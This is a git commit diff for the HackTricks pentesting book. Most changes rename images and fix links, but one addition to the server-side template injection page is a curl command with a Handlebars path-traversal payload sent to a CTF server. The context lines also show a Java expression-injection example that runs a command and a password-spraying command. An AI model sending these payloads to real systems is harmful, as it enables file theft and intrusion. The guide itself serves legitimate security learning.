GitBook: [master] 6 pages modified

2024-11-22 12:43:23 +00:00 · 2021-02-03 09:46:19 +00:00 · 2021-02-03 09:46:19 +00:00 · 586479a922
commit 586479a922
parent c5433b873e
6 changed files with 11 additions and 5 deletions
--- a/README.md
+++ b/README.md
@ -16,7 +16,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
 **If you want to** share some tricks with the community **you can also submit** pull requests **to** [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks) that will be reflected in this book.  
 Don't forget to\*\* give ⭐ on the github to motivate me to continue developing this book.

-![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png)
+![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%283%29.png)

 [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)

--- a/linux-unix/linux-privilege-escalation-checklist.md
+++ b/linux-unix/linux-privilege-escalation-checklist.md
@ -146,7 +146,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
 If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.  
 Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.

-![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png)
+![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png)

 [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*

--- a/pentesting-web/ssti-server-side-template-injection.md
+++ b/pentesting-web/ssti-server-side-template-injection.md
@ -185,6 +185,12 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})

 ### Handlebars \(NodeJS\)

+Path Traversal \(more info [here](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)\).
+
+```bash
+curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'
+```
+
 *  = Error
 * ${7\*7} = ${7\*7}
 *  Nothing
--- a/windows/active-directory-methodology/README.md
+++ b/windows/active-directory-methodology/README.md
@ -398,7 +398,7 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s
 * [Python script to enumerate active directory](https://github.com/ropnop/windapsearch)
 * [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum)

-![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%282%29.png)
+![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png)

 [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*

--- a/windows/active-directory-methodology/password-spraying.md
+++ b/windows/active-directory-methodology/password-spraying.md
@ -67,7 +67,7 @@ or **spray** \(read next section\).

 The best way is not to try with more than 5/7 passwords per account.

-So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use _**[spray](https://github.com/Greenwolf/Spray):**_
+So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use [_**spray**_](https://github.com/Greenwolf/Spray)_**:**_

 ```bash
 spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
--- a/windows/checklist-windows-privilege-escalation.md
+++ b/windows/checklist-windows-privilege-escalation.md
@ -118,7 +118,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
 If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.  
 Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.

-![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png)
+![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png)

 [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*